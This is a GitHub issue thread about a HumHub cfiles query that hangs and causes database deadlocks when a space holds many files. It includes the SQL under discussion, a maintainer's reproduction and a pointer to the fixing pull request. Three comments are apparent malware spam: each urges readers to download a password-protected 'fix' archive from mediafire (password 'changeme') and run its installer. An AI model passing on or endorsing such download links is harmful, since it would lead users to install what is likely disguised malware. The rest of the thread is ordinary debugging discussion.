### ISSUE TITLE
The link "files from the stream" doesn't work with a lot of files AND cause deadlocks!

### ISSUE THREAD

**Issue by Guillaume-Comtois** [humhub/cfiles#230]
I found quite a big problem in the mocule cfile. If you click the link files from the stream and you have too many files, the query will never load and worst, it never stop loading in the background even if you change space, or go anywhere or perform new actions like post and comment. This end up trigger a `PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock`

**This line cause the infinit query** : protected\modules\cfiles\widgets\FileList.php
![image](https://github.com/user-attachments/assets/e609af5e-2711-40a1-9f14-f47d8d9723e0)

**INFINIT SQL count query (count is supposed to be equal to 28299)**
I found out that it's the OR condition in red that cause the infinit query.
Take note that this query has single backslashs, the original has double backslashs.
![image](https://github.com/user-attachments/assets/0f6778d8-b541-4691-a4e0-7a829885c406)

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by yurabakhtin** [comment]
@Guillaume-Comtois Thanks for the report. I have tested with 200 files but cannot reproduce the issue, I don't think the problem may be in the line `(file.object_model = content.object_model`, and I am not sure the SQL query will works slowly for more recrods, for for me the SQL looks correctly:

```sql
SELECT
	count(*)
FROM
	`file`
LEFT JOIN `comment` ON
	(file.object_id = comment.id
		AND file.object_model = 'humhub\\modules\\comment\\models\\Comment')
LEFT JOIN `content` ON
	(comment.object_model = content.object_model
		AND comment.object_id = content.object_id)
	OR (file.object_model = content.object_model
		AND file.object_id = content.object_id)
WHERE
	(`content`.`contentcontainer_id` = 2)
	AND (`content`.`state` = 1)
	AND ((`comment`.`object_model` = 'humhub\\modules\\post\\models\\Post')
		OR (`file`.`object_model` = 'humhub\\modules\\post\\models\\Post'))
ORDER BY
	`file`.`updated_at`
```

![cfiles-pages](https://github.com/user-attachments/assets/54a18cc8-973e-4693-a584-5be6e77e0848)

![test-cfiles-count](https://github.com/user-attachments/assets/676acee8-f587-48ef-9913-9617d3576bcd)

**Comment by ArchBlood** [comment]
@yurabakhtin I'm not sure this will help but it seems to me that the `OR` statement may be the issue in some cases, not all, this becomes more of an issue when it comes to the database not being configured correctly to handle larger datasets. To handle such things we could replace the `OR` statement by splitting the query into two `SELECT` parts and combining them using `UNION ALL` which can mitigate the issue. But overall this is just a Band-Aid method, I'd overall suggest that @Guillaume-Comtois check to make sure that everything is being indexed correctly on their end and double check the database configurations.

**Comment by Guillaume-Comtois** [comment]
> @yurabakhtin I'm not sure this will help but it seems to me that the `OR` statement may be the issue in some cases, not all, this becomes more of an issue when it comes to the database not being configured correctly to handle larger datasets. To handle such things we could replace the `OR` statement by splitting the query into two `SELECT` parts and combining them using `UNION ALL` which can mitigate the issue. But overall this is just a Band-Aid method, I'd overall suggest that @Guillaume-Comtois check to make sure that everything is being indexed correctly on their end and double check the database configurations.

![image](https://github.com/user-attachments/assets/7a54ddda-5efe-434d-a8dd-5fbbde89ac29)
![image](https://github.com/user-attachments/assets/a7ede254-3955-4cce-bfc2-8f188dee1f71)

**Comment by Guillaume-Comtois** [comment]
> @Guillaume-Comtois Thanks for the report. I have tested with 200 files but cannot reproduce the issue, I don't think the problem may be in the line `(file.object_model = content.object_model`, and I am not sure the SQL query will works slowly for more recrods, for for me the SQL looks correctly:
> 
> ```sql
> SELECT
> 	count(*)
> FROM
> 	`file`
> LEFT JOIN `comment` ON
> 	(file.object_id = comment.id
> 		AND file.object_model = 'humhub\\modules\\comment\\models\\Comment')
> LEFT JOIN `content` ON
> 	(comment.object_model = content.object_model
> 		AND comment.object_id = content.object_id)
> 	OR (file.object_model = content.object_model
> 		AND file.object_id = content.object_id)
> WHERE
> 	(`content`.`contentcontainer_id` = 2)
> 	AND (`content`.`state` = 1)
> 	AND ((`comment`.`object_model` = 'humhub\\modules\\post\\models\\Post')
> 		OR (`file`.`object_model` = 'humhub\\modules\\post\\models\\Post'))
> ORDER BY
> 	`file`.`updated_at`
> ```
> 
> ![cfiles-pages](https://private-user-images.githubusercontent.com/6995524/361900225-54a18cc8-973e-4693-a584-5be6e77e0848.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ5NDU2MjIsIm5iZiI6MTcyNDk0NTMyMiwicGF0aCI6Ii82OTk1NTI0LzM2MTkwMDIyNS01NGExOGNjOC05NzNlLTQ2OTMtYTU4NC01YmU2ZTc3ZTA4NDgucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDgyOSUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA4MjlUMTUyODQyWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NDAxZDgyZmIzYzcwNjhiMGEzNzJkNDA3OTU2ZTdjZTlkYzNhYzhlZWIzZjNlM2VkZDBkYjU4YTIwNTRlMjEzMiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.Qm3_sAdVp7kP6AgaHe7oLAvVxA0CPGxHQVSsASUtlQo)
> 
> ![test-cfiles-count](https://private-user-images.githubusercontent.com/6995524/361900257-676acee8-f587-48ef-9913-9617d3576bcd.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ5NDU2MjIsIm5iZiI6MTcyNDk0NTMyMiwicGF0aCI6Ii82OTk1NTI0LzM2MTkwMDI1Ny02NzZhY2VlOC1mNTg3LTQ4ZWYtOTkxMy05NjE3ZDM1NzZiY2QucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDgyOSUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA4MjlUMTUyODQyWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9ODk1NDg4OGE1M2ZiMDg0NDQxYmIwMzg3M2Y4NTEyZjBkZTJiY2QzOTYzZDJhYWUxMzYxZWMyYjczMDFlYmExYiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.i_V3QYUWpjGhnolY_q2fgHOED-aAkgx6Dpj0XSRdz6o)

I have 1 024 878 content records, 100k file records and the count query is supposed to return 29,000. The query is working until I add the OR conditon in red. Do I need to index a column?

**Comment by ArchBlood** [comment]
> I have 1 024 878 content records, 100k file records and the count query is supposed to return 29,000. The query is working until I add the OR conditon in red. Do I need to index a column?

If the issue is with the cfile module then these are the tables to look at;

![Screenshot_6](https://github.com/user-attachments/assets/5eb1ef39-e160-4f84-ba29-6e3742aa2cb5)

Currently I'm not seeing any issues on my end with the core file module, I've even tested using the develop branch of 1.17.0-dev and see no issues. Could you provide more information on your database type used? Does it meet the requirements for HumHub? Are you using MyISAM, if so I wouldn't recommend using it if you plan on running HumHub;

https://docs.humhub.org/docs/admin/troubleshooting#data-integrity
https://docs.humhub.org/docs/admin/requirements#database

**Comment by yurabakhtin** [comment]
@Guillaume-Comtois Thank you for the report and sorry for a delayed fix.

I could reproduce the slow query on DB with 25664 Contents, 12300 Posts, 1058 Comments, 13323 Files:

![test-big-data](https://github.com/user-attachments/assets/f5125564-b41e-4a5e-b174-836b6fe88acd)

After fix:
![fixed-slow-query](https://github.com/user-attachments/assets/07cff34e-a8e5-47ae-bca2-8569f745304f)

@luke- Please merge the PR https://github.com/humhub/cfiles/pull/233.
